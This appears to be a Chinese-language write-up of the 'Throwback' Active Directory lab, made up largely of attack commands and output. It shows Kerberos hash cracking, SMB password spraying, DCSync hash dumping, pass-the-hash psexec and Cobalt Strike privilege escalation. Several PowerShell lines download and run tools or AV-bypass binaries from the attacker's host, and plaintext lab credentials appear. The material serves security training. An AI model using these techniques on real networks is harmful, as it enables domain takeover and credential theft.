b80d33920af4ee9d55ba3aa672d3f2fa510b63724c40d66d5a434194e7c8cff51399e37270bcbe29a4aaf904902e3f396cfff5bc4ddc7b92bddfb6bdd22dfdf49a845a030f4c46eabe4398246faf934416a8262aa9aab2dd82f567ec9190a561332e4adcd00f7eec64e1e6f93105eded1470cacc763d7aa74751c93d22217daf159bc95f178f88efc0b3bd6aeccca9f19d6c24
hashcat -m 13100 -a 0 sqlhash.txt ~/pentest/wordlists/rockyou.txthashcat sqlhash.txt --show
$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$77e0317a5d961420b1b891151aa0c781$74f5aabe443307b8fc7fb4d8859830214e7cd954cb51dd6e53c0b5c93dc7c4d120f354f657d95ed644745083b4011c29a8be2dc3dc45ac6bcd3e438270665fceebe4004afb096217690c244423cbb3deeab57c6da724068db483b7137902f6f0d36ffc3547910c574014c9f8008e14b2ef3561530d71a5005f8a65bedcacedba5dff02b5499dec6e0179ebe96f5c1399ec49b3ed0d92936804900725d0cfdff46f7140bb43884cf20c2c70d2ae00c474699c4d4c8e72982ef2deb9e855650472ba713b4ef0ef7ba2f6bd3802826d5dd75bf4af560629594ee807a0d49cb16b12b43364773d6dcd9437163b0bfb77dac1ed8848aa0d1fc4bd710069f9c46812542acb01bc6a0a5a71eb0dc1af16181fcd5ce559d1e540a33d4ad5936c3217b3a4e08f93c7eb8823ce76d2f9e578a3d56a2926f03689d3ffb562c91889605c781a51aa12b15d707d959aa10f5e4371a054b8dd4c2d2e91ca545ef9e15876b227fef0bc4473fbfa0fa7b0e87662e987edffefd6da3708438f108dfde61b08e715400687b673ac1ab6ebaf49c877e72f66b2387e5cebbfb70a7b3c22356bed6ff11b741be5bef82bddd80a61b6cab93c9f20ed7b8dfaa53aa80fe63314b4f94c78150b2d86b85e6c088988152bea69b0b11297dfc0300e459a428b7ae501ca4d0d36ec8ce855ad366802994c43d9da8fbb134065c104b0a9bb456f5acc200882e851c6e8e630bf622fcdf541f9cdc5f38b18b3d1be6cc4744f39bfbc6c66ca44a22d850b7c2186fdd629dd9c67d6af7837d87ea5f751548b68e47b13145cec902369054971db14731efc00d34bb16b7523c3084e72f03d20db79492acb030c566f32cd5299bb19d3475db74c33603b76009f4d8873cf290c67460f638c69767d6518d3fa1653a6c6365e53632dbec371647e35bc741cc95beafa776e4cb99dcb695ecfc74e963aa27ffd4564dbf431387ccc3f118757354c51e65ee4d0091728417cd8a6c836971d4bae5ccc9185377f96aa8e4de6a0a0fcb49a1f020fdd1a7298c8668a2c157bc235c9881d61a1f94b294428eca22c0f5e95a26fdfc7e94ae75a6cc8f6a3c8d1be125e20588067664a9931b844cde9bbd3fbbf03afecee0635f31dce4b2c81135ef0f3d51364f7daf0e9968335f26e5847de0e4b2a3c60b80d33920af4ee9d55ba3aa672d3f2fa510b63724c40d66d5a434194e7c8cff51399e37270bcbe29a4aaf904902e3f396cfff5bc4ddc7b92bddfb6bdd22dfdf49a845a030f4c46eabe4398246faf934416a8262aa9aab2dd82f567ec9190a561332e4adcd00f7eec64e1e6f93105eded1470cacc763d7aa74751c93d22217daf159bc95f178f88efc0b3bd6aeccca9f19d6c24:mysql337570

Portbrute

因为cme的报错缘故所以我使用了portbrute作为smb批量爆破工具

proxychains4 ./PortBruteMac.......Scan complete. 3 vulnerabilities found! [+] 10.200.34.117 445 JeffersD Throwback2020 [+] 10.200.34.117 445 HumphreyW securitycenter [+] 10.200.34.117 445 DaviesJ Management2018 Run Time is : 1m10.393404951s

经过测试能正常登陆ssh的账号为JeffersD

proxychains4 ssh JeffersD@10.200.34.117

利用powershell 先上线主机(用代理执行卡的要死,直接先上线)

在C:\Users\jeffersd\Documents\backup_notice.txt

beacon> shell type C:\Users\jeffersd\Documents\backup_notice.txt[*] Tasked beacon to run: type C:\Users\jeffersd\Documents\backup_notice.txt[+] host called home, sent: 81 bytes[+] received output:As we backup the servers all staff are to use the backup account for replicating the serversDon't use your domain admin accounts on the backup servers.
The credentials for the backup are:TBH_Backup2348!
Best Regards,Hans MercerThrowback Hacks Security System Administrator

SecretsDump

从 Bloodhound 中,我们可以发现有一个具有 dcsync 权限的备份帐户(backup),我们可以利用它来转储哈希值。

[email protected]  ~/Downloads  proxychains4 secretsdump.py -dc-ip 10.200.34.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.34.117[proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 10.50.31.71:5555 ... 10.200.34.117:445 ... OK[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets[proxychains] Strict chain ... 10.50.31.71:5555 ... 10.200.34.117:135 ... OK[proxychains] Strict chain ... 10.50.31.71:5555 ... 10.200.34.117:49667 ... OKAdministrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::CORPORATE$:aes128-cts-hmac-sha1-96:60d15b106d306965097caef803b02e68CORPORATE$:des-cbc-md5:2adce3b525310e52[*] Cleaning up...

解密MercerH账号hash:pikapikachu7(他要求填的内容就直接上线取得root.txt文件)利用其他用户直接上线cs

当然密码无解的时候可以

Proxychains4 psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/MercerH"@10.200.34.117

获取帐户描述上的flag cs执行

shell powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.31.71:8080/PowerView.ps1'); Get-NetUser | select samaccountname, description"

上传sharphound 分析后发现Mercerh在另一个域也是可以登陆的

登陆corp-dc01

要先修改下代理。使用117机器做代理.这里需要做免杀处理的

proxychains4 psexec.py "THROWBACK.local/MercerH:pikapikachu7"@10.200.34.118

powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe

github

在任何一家公司都有存在github的泄漏的风险。

已知道信息:

公司:Throwback

程序关键字:Timekeep、Throwback Hacks Login

通过相关搜索得到

https://github.com/RikkaFoxx/Throwback-Time

历史修改中发现新的一些信息

https://github.com/RikkaFoxx/Throwback-Time/commit/33f218dcab06a25f2cfb7bf9587ca09e2bfb078c

设置corp-dc01代理

load PortScan_ICMP: 10.200.34.243           02-F1-AD-C4-94-E1           
[+] received output:PCname: 10.200.34.243 CORP-ADT0110.200.34.243 139 Open -> Banner: Windows NetbiosIP Finished!End: 2022-06-25 08:19:2310.200.34.243 5985 Open -> Banner: Win Winrm10.200.34.243 445 Open -> Default is SMB 10.200.34.243 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.7

上线CORP-ADT01

proxychains4 ssh DaviesJ@10.200.34.243powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe
beacon> getprivs[*] Tasked beacon to enable privileges[+] host called home, sent: 755 bytes[+] received output:SeDebugPrivilegeSeTcbPrivilegeSeCreateTokenPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeSecurityPrivilegeSeTakeOwnershipPrivilegeSeLoadDriverPrivilegeSeSystemProfilePrivilegeSeSystemtimePrivilegeSeProfileSingleProcessPrivilegeSeIncreaseBasePriorityPrivilegeSeCreatePagefilePrivilegeSeBackupPrivilegeSeRestorePrivilegeSeShutdownPrivilegeSeAuditPrivilegeSeSystemEnvironmentPrivilegeSeChangeNotifyPrivilegeSeRemoteShutdownPrivilegeSeUndockPrivilegeSeEnableDelegationPrivilegeSeManageVolumePrivilegebeacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are CORPORATE\DaviesJ (admin)
beacon> getsystem[*] Tasked beacon to get SYSTEM[+] host called home, sent: 2743 bytes[+] Impersonated NT AUTHORITY\SYSTEM
beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITY\SYSTEM (admin)
*] Tasked beacon to run: type C:\Users\dosierk\Documents\email_update.txt[+] host called home, sent: 79 bytes[+] received output:Hey team! Hope you guys are having a good day!
As all of you probably already now we are transferring to our new email service as wetransition please use the new emails provided to you as well as the default credentialsthat can be found within your emails.
Please do not use these emails outside of corporate as they contain sensitive information.
The new email format is based on what department you are in:
[email protected][email protected][email protected][email protected][email protected]
In order to access your email you will need to go to mail.corporate.local as we get our servers moved over.
If you do not already have mail.corporate.local set in your hosts file please reach out toIT to get that fixed.
Please remain patient as we make this transition and please feel free to email me with anyquestions you may have regarding the new transition: [email protected]
Karen Dosier,Human Relations Consulatant

互联网信息收集

leetLinked

从LinkedIn上获取他的相关的信息

邮箱地址生成

可以根据不同职能部门生成更多的mail地址(sec,its,hre...)

密码泄漏查询

设置指向

echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts

利用本地搭建的breachgtfo去查询。没有api接口 burp跑

邮箱登陆

Email: [email protected]Password: aqAwM53cW8AgRbfrUsername: JStewartData Breach: pwnDB

TBSEC-DC01

根据新的提示ip:10.200.34.79

扫描目标端口

PCname: 10.200.34.79 TBSEC-DC0110.200.34.79 139 Open -> Banner: Windows Netbios10.200.34.79 445 Open -> Default is SMB 10.200.34.79 389 Open -> Default is LDAP IP Finished!End: 2022-06-25 11:07:4610.200.34.79 636 Open 10.200.34.79 88 Open -> Default is Kerberos 10.200.34.79 5985 Open -> Banner: Win Winrm
[+] received output:WebTitle: http://10.200.34.79:80 -> IIS Windows ServerWebBanner: http://10.200.34.79:80 -> Microsoft-IIS/10.010.200.34.79 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 Jun 2022 11:07:45 GMT Connection: close10.200.34.79 3389 Open -> Default is RDP 10.200.34.79 135 Open -> Default is WMI

权限比较低。

rdp太卡没法连接。使用GetUserSPNs.py 获取一个高权限

hashcat -a 0 -m 13100 ~/Downloads/thmhash.txt ~/pentest/wordlists/rockyou.txt
$krb5tgs$23$*TBService$TBSECURITY.LOCAL$TBSECURITY.local/TBService*$9c3fe05f76596a5ef79a14cc067afc65$11c902eb82eda9d2445552fa5fda458d3ee87caaaa817e6dfea77089f60e80236cc6ef8e9590e0d43f0b131a039cb7f806fb57d44425702c473c7d62a0c55166ebdf9d3f9a88bd77a861aa5567771939bea93d2d4d1197b7c9c98c74aebaba5f85390570e85a606e88ca178ae93acce4274f0422758317fb966c0691ea4705c093ecf2335bd9198768b0cf2a8cecbea335da94e72139681e21e3fcb4988cafcc90744fea97b4467a8db59c687fa3c97654fff01715cbe69db4764c0b4018a227a0b6492afe13870a0d26ffc3dcedcd963f4219f9810f714ae096556f3a4dcf1a19535d177971ab617d9a77e7e633168d7b6749fcb20537260aabac8b1079f59d1ba3218b8f5a654641183ac6fbee81dc937bfd6e5dc640d2d349abc8dedd1099043dedeb11dd0cedb85f9edd8d2fa48d7d24a273d4cf4c30982e55041c3a5599cc7086b0d677dd07ae5722bf92201221053d26060de45e60025ff6b3e415ab49c347525a0c984f2c125e676843051fe2271773c3c305e11332e31a8a95ce01d0f215c82ab2ab5049d4dd7504ee6f77c0c096b815df4f513dc188b886faa1dbd47ebd1e103233fc19baf719c48c190a3f83bdc18879488ff2fa9166fdd0dfb357429d0b58fde6c9c211229847a62b4834391248553b96cfa251741318be5eea73947ef44824b9a1f89829fb793e065397e7c9c9e8712f50eb7c5358f10af130e98f4758327f8779b30da96c2091ebde2a3676430a520dd51228653e26dfe74695b3c203631b1a6e5a1c8fc01e0efcf4bcf8563891cb1396e2f109e18dd219ba6b09207c1dda6127fe6f92695d2c089820acc528f8a25cea1311773b1a03cd91a20b958da203444252d63df7651a20a693e2fa90fd73bc6f743dda2c1ed868590a1558a905f29008fe73fe34a115f4e2d3eddef59d54d84bc0b1298200e8063cf75beb99eb3c4aecfd76f26459409eb2992fd445c71711ba242706fde21cb640ef6f300a246147ac78d087289642d9204bb0ea7e9f8175a7d36b654e44b2ec6360c82c140362a90985d3549891e1b1287eb6db0fabef2d0e563b38112b0a3f2f5940c6e0b78bbd8b88e32d7dc049a43679c150c025d2606d29d0df3821d7d75e6b16069f5c97fda549bca0aa17fc792066729ad185b8e0548eb9844d3d66568eca24198be764eba30743437a1ddbebe02ea570436b723d2fd9a1fb8de485a7d646052f3086f1ffe7ce2e3ae6737c4647b61a422e6f2187aa43bd18be372d48c448c994ae018180c83a285499e8329e7fb3db443d32496a6994d40a5f17c4e6f7317aa4d01557d07c2cf76567454fe2aa118e7d72339c15f546fe6122d4ea2a026ff67ce558bfef59f4faf031af0a005c049e3677e5b96451862b603864:securityadmin284650
proxychains4 psexec.py TBSECURITY.local/TBService:[email protected]10.200.34.79powershell wget http://10.50.31.71:8080/BypassAV.exe -o C:\windows\temp\BypassAV.exe


文章来源: https://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868332&idx=1&sn=63d90c2e0f154cc3b52d88d96d2841e9&chksm=8442b44bb3353d5d080d2ebc1a88953b282c2b29cbd5f07e291aa9cc30b8f130df10b7300876#rd
如有侵权请联系:admin#unsafe.sh